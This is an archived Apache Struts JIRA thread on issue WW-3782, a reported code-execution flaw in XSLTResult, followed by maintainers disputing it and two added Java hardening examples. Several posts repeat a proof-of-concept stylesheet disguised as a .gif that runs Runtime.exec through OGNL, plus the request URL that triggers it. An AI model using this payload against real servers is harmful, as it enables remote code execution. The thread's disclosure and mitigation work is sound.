Posted to issues@struts.apache.org by "kxlzx (Created) (JIRA)" <ji...@apache.org> on 2012/03/22 03:53:25 UTC

[jira] [Created] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Struts 2 framework XSLTResult local file code execution vulnerability
---------------------------------------------------------------------

                 Key: WW-3782
                 URL: https://issues.apache.org/jira/browse/WW-3782
             Project: Struts 2
          Issue Type: Bug
          Components: Core Actions
    Affects Versions: 2.3.1.2
            Reporter: kxlzx
            Priority: Critical


http://www.inbreak.net/archives/319

Reporter: kxlzx, Alibaba Security Team
http://www.inbreak.net/
Struts 2 lets an action have several result types, one of which is the XSLT type. This type accepts a file path submitted by the user and parses that file as an XSLT stylesheet, whatever its extension.
This is the code in XSLTResult:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
// read the value of the user-supplied "xslt.location" parameter
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
// parse the file at the user-supplied path as XSLT
templates = factory.newTemplates(new StreamSource(resource.openStream()));

XSLT processing allows Java static methods to be invoked, so all it takes is uploading a file to the server, for example
 /upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
		 version="1.0" xmlns:ognl="ognl.Ognl">
	<xsl:template match="/">
		<html> 
			<body> 
			   <h2>hacked by kxlzx</h2> 
			   <h2>http://www.inbreak.net</h2> 
			   <exp>
					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
				</exp>
			</body> 
		</html> 
	</xsl:template> 
</xsl:stylesheet>


When this XSL file is processed, it calls the following from OGNL:
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

which leads to arbitrary code execution.


Suppose the URL of an action with an XSLT result is
 
http://www.inbreak.net/xslt.action
 
then we can request
 
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif

and the result is:
http://www.inbreak.net/wp-content/uploads/2011/08/struts.jpg



--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
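The report above combines two ingredients: the XSLT result loads a stylesheet from a path taken straight out of a request parameter, and the stylesheet reaches into Java through an extension-function namespace. The following self-contained program is an added illustration written for this page; it is neither Struts code nor the reporter's. It compiles a stylesheet that calls java.lang.System.getProperty through the Xalan-style http://xml.apache.org/xalan/java namespace (a harmless stand-in for the report's ognl.Ognl namespace and Runtime.exec call) with the JDK's bundled XSLTC processor, first through a stock TransformerFactory and then through one with FEATURE_SECURE_PROCESSING enabled, which makes XSLTC refuse the extension call. It also shows the server-side alternative to trusting xslt.location: the client may only name an allowlisted stylesheet, resolved under a fixed directory. The directory /WEB-INF/xslt, the names report.xslt and export.xslt, and the use of the JDK's own XSLTC (rather than a separate Xalan-J jar) are assumptions of the example.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Set;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public class XsltExtensionDemo {

    // Constructed stylesheet: same shape as the reporter's, but the extension namespace
    // points at java.lang.System instead of ognl.Ognl, so the side effect is a property
    // read rather than a process launch. Assumes the JDK's bundled XSLTC, which honours
    // the http://xml.apache.org/xalan/java extension namespace.
    static final String STYLESHEET =
        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
      + "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n"
      + "    xmlns:java=\"http://xml.apache.org/xalan/java\">\n"
      + "  <xsl:output method=\"text\"/>\n"
      + "  <xsl:template match=\"/\">\n"
      + "    <xsl:value-of select=\"java:java.lang.System.getProperty('java.version')\"/>\n"
      + "  </xsl:template>\n"
      + "</xsl:stylesheet>\n";

    static final String INPUT_XML = "<doc/>";   // constructed input document

    /** Vulnerable setup: a stock factory compiles and runs any extension call it finds. */
    static TransformerFactory permissiveFactory() {
        return TransformerFactory.newInstance();
    }

    /** Hardened setup: secure processing disables Java extension functions in XSLTC, and
     *  the external-access properties stop a stylesheet from fetching DTDs or other
     *  stylesheets from arbitrary locations. */
    static TransformerFactory hardenedFactory() throws TransformerException {
        TransformerFactory f = TransformerFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return f;
    }

    /** Compiles and runs STYLESHEET with the given factory. Returns the text output, or
     *  null when the processor refuses the extension call (XSLTC reports the refusal while
     *  the transform runs, wrapped in a TransformerException). */
    static String transform(TransformerFactory factory) {
        try {
            Templates templates = factory.newTemplates(new StreamSource(new StringReader(STYLESHEET)));
            Transformer transformer = templates.newTransformer();
            StringWriter out = new StringWriter();
            transformer.transform(new StreamSource(new StringReader(INPUT_XML)), new StreamResult(out));
            return out.toString().trim();
        } catch (TransformerException | RuntimeException e) {
            return null;
        }
    }

    // Assumed deployment layout: stylesheets live only here and only these names exist.
    static final Path STYLESHEET_DIR = Paths.get("/WEB-INF/xslt").toAbsolutePath().normalize();
    static final Set<String> ALLOWED = Set.of("report.xslt", "export.xslt");

    /** What "read xslt.location from the request" should have been: the client may only
     *  name an allowlisted stylesheet, and the resolved path must stay under STYLESHEET_DIR
     *  (the second check is redundant with the allowlist and kept as defence in depth). */
    static Path resolveStylesheet(String requestedName) {
        if (requestedName == null || !ALLOWED.contains(requestedName)) {
            throw new IllegalArgumentException("stylesheet not permitted: " + requestedName);
        }
        Path resolved = STYLESHEET_DIR.resolve(requestedName).normalize();
        if (!resolved.startsWith(STYLESHEET_DIR)) {
            throw new IllegalArgumentException("path escapes stylesheet directory: " + requestedName);
        }
        return resolved;
    }

    public static void main(String[] args) throws Exception {
        // Stock factory: the extension call runs and the JVM version string comes back.
        System.out.println("permissive: " + transform(permissiveFactory()));
        // Hardened factory: the extension call is refused and transform() returns null.
        System.out.println("hardened:   " + transform(hardenedFactory()));
        System.out.println("resolved:   " + resolveStylesheet("report.xslt"));
        try {
            resolveStylesheet("../../upload/7758521.gif");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected:   " + e.getMessage());
        }
    }
}
```

Build and run with `javac XsltExtensionDemo.java && java XsltExtensionDemo` on Java 9 or later (Set.of). If Xalan-J is on the classpath instead of the JDK's XSLTC, `setAttribute` for the ACCESS_EXTERNAL_* properties may throw IllegalArgumentException, and Xalan-J has its own switches for extension functions; the point of the example holds either way: a transformer that accepts extension functions turns any stylesheet the attacker can place on disk into code execution, so the stylesheet location must never be chosen by the client, and the processor should refuse extension functions even when the location is.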

       

[jira] [Updated] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "kxlzx (Updated) (JIRA)" <ji...@apache.org>.
     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

kxlzx updated WW-3782:
----------------------

    Attachment: struts.jpg
    

       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "kxlzx (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235345#comment-13235345 ] 

kxlzx commented on WW-3782:
---------------------------

I have always used Google Translate myself; this time I recommend it to everyone.

If you can not read, open here.

http://translate.google.com/#zh-CN|en|%E5%A6%82%E6%9E%9C%E4%BD%A0%E7%9C%8B%E4%B8%8D%E6%87%82%EF%BC%8C%E8%AF%B7%E6%89%93%E5%BC%80%E8%BF%99%E9%87%8C%E3%80%82
                

       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "zhouyanming (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302 ] 

zhouyanming commented on WW-3782:
---------------------------------

Man, that's too funny; the Celestial Empire hasn't conquered the whole world yet.
                

       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "Lukasz Lenart (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235436#comment-13235436 ] 

Lukasz Lenart commented on WW-3782:
-----------------------------------

You mean that your application is taking a user file and using it as an input for the XSLT Result? Without checking the content of the file? XSLT Result was designed to be based on server-side files and not to use any file uploaded by an arbitrary user.

It's exactly the same case as when you aren't escaping input form parameters and use them directly in your SQL queries - it's called SQL injection.
                
> Struts 2 framework XSLTResult local file code execution vulnerability
> ---------------------------------------------------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> Struts 2 lets an action have several result types, one of which is the XSLT type. This type accepts a file path submitted by the user and parses that file as an XSLT stylesheet, whatever its extension.
>  This is the code in XSLTResult:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> // read the value of the user-supplied "xslt.location" parameter
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> // parse the file at the user-supplied path as XSLT
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> Because of this code, as soon as any action in a project uses xsltResult, an attacker can make the application parse a file the attacker uploaded as XSLT.
> Example of an action that uses xsltResult:
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT processing allows Java static methods to be invoked, so the attacker only needs to upload a file to the server,
> for example:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> 		 version="1.0" xmlns:ognl="ognl.Ognl">
> 	<xsl:template match="/">
> 		<html> 
> 			<body> 
> 			   <h2>hacked by kxlzx</h2> 
> 			   <h2>http://www.inbreak.net</h2> 
> 			   <exp>
> 					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
> 				</exp>
> 			</body> 
> 		</html> 
> 	</xsl:template> 
> </xsl:stylesheet>
> When this XSL file is processed, it calls the following from OGNL:
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> which leads to arbitrary code execution.
> If the URL of an action with an XSLT result is
>  
> http://www.inbreak.net/xslt.action
>  
> then the attacker can request
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> and the result is:
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!


       

[jira] [Updated] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "kxlzx (Updated) (JIRA)" <ji...@apache.org>.
     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

kxlzx updated WW-3782:
----------------------

    Description: 
http://www.inbreak.net/archives/319

Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
Struts 2 lets an action have several result types, one of which is the XSLT type. This type accepts a file path submitted by the user and parses that file as an XSLT stylesheet, whatever its extension.
 This is the code in XSLTResult:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
// read the value of the user-supplied "xslt.location" parameter
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
// parse the file at the user-supplied path as XSLT
templates = factory.newTemplates(new StreamSource(resource.openStream()));

XSLT processing allows Java static methods to be invoked, so all it takes is uploading a file to the server, for example
 /upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
		 version="1.0" xmlns:ognl="ognl.Ognl">
	<xsl:template match="/">
		<html> 
			<body> 
			   <h2>hacked by kxlzx</h2> 
			   <h2>http://www.inbreak.net</h2> 
			   <exp>
					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
				</exp>
			</body> 
		</html> 
	</xsl:template> 
</xsl:stylesheet>


When this XSL file is processed, it calls the following from OGNL:
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

which leads to arbitrary code execution.


Suppose the URL of an action with an XSLT result is
 
http://www.inbreak.net/xslt.action
 
then we can request
 
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif

and the result is:
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!


       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "Lukasz Lenart (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235406#comment-13235406 ] 

Lukasz Lenart commented on WW-3782:
-----------------------------------

What is the problem?

If you can not read, open here.

http://translate.google.com/#pl|zh-CN|W%20czym%20jest%20problem%20%3F
                

       

[jira] [Updated] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "Rene Gielen (Updated) (JIRA)" <ji...@apache.org>.
     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Rene Gielen updated WW-3782:
----------------------------

         Priority: Minor  (was: Critical)
    Fix Version/s: 2.3.2
    

       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "kxlzx (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235429#comment-13235429 ] 

kxlzx commented on WW-3782:
---------------------------

An attacker can upload an image file and execute arbitrary code.

If you can not read, open here.

http://translate.google.cn/?hl=en#zh-CN|en|%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E4%BB%A5%E4%B8%8A%E4%BC%A0%E5%9B%BE%E7%89%87%E6%96%87%E4%BB%B6%EF%BC%8C%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81
                

       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "Lukasz Lenart (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235434#comment-13235434 ] 

Lukasz Lenart commented on WW-3782:
-----------------------------------

First you're talking about some file upload issue with the XSLT plugin, next you're presenting some hardcoded code with a call to static methods (which can be blocked by setting a configuration flag).

And first of all, please report any security issues through security@struts.apache.org
                

       

[jira] [Commented] (WW-3782) Struts 2 framework XSLTResult local file code execution vulnerability

Posted by "kxlzx (Commented) (JIRA)" <ji...@apache.org>.
    [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235441#comment-13235441 ] 

kxlzx commented on WW-3782:
---------------------------

If the application's code looks like:
<action name="xslt" class="net.inbreak.xsltAction">
  <result type="xslt"/>
</action>

then the attacker can upload a file:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                version="1.0" xmlns:ognl="ognl.Ognl">
  <xsl:template match="/">
    <html>
      <body>
        <h2>hacked by kxlzx</h2>
        <h2>http://www.inbreak.net</h2>
        <exp>
          <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
        </exp>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>

and open the URL
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

then the application will execute
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

So, if an application uses the XSLT result, there is a local code execution vulnerability.
                
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> Struts2 allows an action to have several result types, including the XSLT type. This type accepts a file path submitted by the user and parses it as an XSLT file, whatever its extension is.
> This is the code of the XSLTResult file:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> // get the value of "xslt.location" submitted by the user
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> // parse the file path submitted by the user as XSLT
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> Because of this code, as long as any action in the project uses xsltResult, an attacker can make the application parse a file the attacker uploaded as XSLT.
> An example of an action that uses xsltResult:
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT parsing allows Java static methods to be executed, so the attacker only needs to upload a file onto the server,
> for example:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> 		 version="1.0" xmlns:ognl="ognl.Ognl">
> 	<xsl:template match="/">
> 		<html> 
> 			<body> 
> 			   <h2>hacked by kxlzx</h2> 
> 			   <h2>http://www.inbreak.net</h2> 
> 			   <exp>
> 					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
> 				</exp>
> 			</body> 
> 		</html> 
> 	</xsl:template> 
> </xsl:stylesheet>
> When this xsl file is parsed, it calls the following from ognl:
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> which leads to arbitrary code execution.
> Suppose the address of an action with an xslt result is
>  
> http://www.inbreak.net/xslt.action
>  
> Then the attacker can submit
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> and it turns into
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!


[jira] [Resolved] (WW-3782) Struts2 framework XSLTResult local file code execution vulnerability

Posted by "Rene Gielen (Resolved) (JIRA)" <ji...@apache.org>.
     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Rene Gielen resolved WW-3782.
-----------------------------

    Resolution: Not A Problem

In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.
                
> Struts2 framework XSLTResult local file code execution vulnerability
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Minor
>              Labels: patch
>             Fix For: 2.3.2
>
>         Attachments: struts.jpg


[jira] [Updated] (WW-3782) Struts2 framework XSLTResult local file code execution vulnerability

Posted by "kxlzx (Updated) (JIRA)" <ji...@apache.org>.
     [ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

kxlzx updated WW-3782:
----------------------

    Description: 
http://www.inbreak.net/archives/319

Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
Struts2 allows an action to have several result types, including the XSLT type. This type accepts a file path submitted by the user and parses it as an XSLT file, whatever its extension is.


This is the code of the XSLTResult file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
// get the value of "xslt.location" submitted by the user
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
// parse the file path submitted by the user as XSLT
templates = factory.newTemplates(new StreamSource(resource.openStream()));

Because of this code, as long as any action in the project uses xsltResult, an attacker can make the application parse a file the attacker uploaded as XSLT.

An example of an action that uses xsltResult:
<action name="xslt" class="net.inbreak.xsltAction">
   <result type="xslt"/>
</action>

XSLT parsing allows Java static methods to be executed, so the attacker only needs to upload a file onto the server,

for example:

/upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
		 version="1.0" xmlns:ognl="ognl.Ognl">
	<xsl:template match="/">
		<html> 
			<body> 
			   <h2>hacked by kxlzx</h2> 
			   <h2>http://www.inbreak.net</h2> 
			   <exp>
					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
				</exp>
			</body> 
		</html> 
	</xsl:template> 
</xsl:stylesheet>


When this xsl file is parsed, it calls the following from ognl:
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

which leads to arbitrary code execution.


Suppose the address of an action with an xslt result is
 
http://www.inbreak.net/xslt.action
 
Then the attacker can submit
 
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif

and it turns into
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

  was:
http://www.inbreak.net/archives/319

Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
Struts2 allows an action to have several result types, including the XSLT type. This type accepts a file path submitted by the user and parses it as an XSLT file, whatever its extension is.
This is the code of the XSLTResult file:

http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
// get the value of "xslt.location" submitted by the user
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
// parse the file path submitted by the user as XSLT
templates = factory.newTemplates(new StreamSource(resource.openStream()));

And XSLT parsing allows Java static methods to be executed, so one only needs to upload a file onto the server, for example
 /upload/7758521.gif

<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
		 version="1.0" xmlns:ognl="ognl.Ognl">
	<xsl:template match="/">
		<html> 
			<body> 
			   <h2>hacked by kxlzx</h2> 
			   <h2>http://www.inbreak.net</h2> 
			   <exp>
					 <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
				</exp>
			</body> 
		</html> 
	</xsl:template> 
</xsl:stylesheet>


When this xsl file is parsed, it calls the following from ognl:
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')

which leads to arbitrary code execution.


Suppose the address of an action with an xslt result is
 
http://www.inbreak.net/xslt.action
 
we can then submit
 
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif

and it turns into
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

    

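The mitigation the resolution points at, written out as an added example that is neither Struts' own code nor the reporter's: the application picks the stylesheet from its own server-side allow-list instead of the client-supplied "xslt.location" path, and compiles it with extension functions disabled so an ognl:getValue(...) call cannot run. It assumes the JDK's built-in JAXP factory on Java 9 or later (for Map.of); the class name and the stylesheet paths are assumptions.

```java
import java.io.InputStream;
import java.util.Map;
import javax.servlet.ServletContext;
import javax.servlet.http.HttpServletRequest;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamSource;

/**
 * Added example, not Struts code: resolves the stylesheet for an xslt result
 * from a fixed server-side allow-list instead of the client-supplied path that
 * XSLTResult reads from "xslt.location", and compiles it with a locked-down
 * TransformerFactory. Class name and stylesheet paths are assumptions.
 */
public final class SafeXsltLoader {

    // Logical names the client may request, mapped to stylesheets that ship
    // with the application. An upload path, a traversal or a URL never matches.
    private static final Map<String, String> ALLOWED = Map.of(
        "report", "/WEB-INF/xslt/report.xsl",
        "export", "/WEB-INF/xslt/export.xsl");

    /** Returns the compiled stylesheet, or throws if the request names an unknown one. */
    public static Templates load(HttpServletRequest request, ServletContext ctx)
            throws Exception {
        String name = request.getParameter("xslt.location");
        String path = (name == null) ? null : ALLOWED.get(name);
        if (path == null) {
            throw new IllegalArgumentException("unknown stylesheet: " + name);
        }

        TransformerFactory factory = TransformerFactory.newInstance();
        // With secure processing on, the JDK's XSLTC (and Xalan) refuse extension
        // functions, so a template calling ognl:getValue(...) fails to compile
        // instead of running Java.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // No fetching of external stylesheets (xsl:import/xsl:include/document())
        // or DTDs from the stylesheet; JAXP 1.5+ (Java 7u40 / 8 and later).
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");

        // Load from the web application's own resources, never from the upload area.
        try (InputStream in = ctx.getResourceAsStream(path)) {
            if (in == null) {
                throw new IllegalStateException("stylesheet missing: " + path);
            }
            return factory.newTemplates(new StreamSource(in, path));
        }
    }
}
```

A factory other than the JDK's may reject the ACCESS_EXTERNAL_* attributes; check its documentation for the equivalent setting before relying on them.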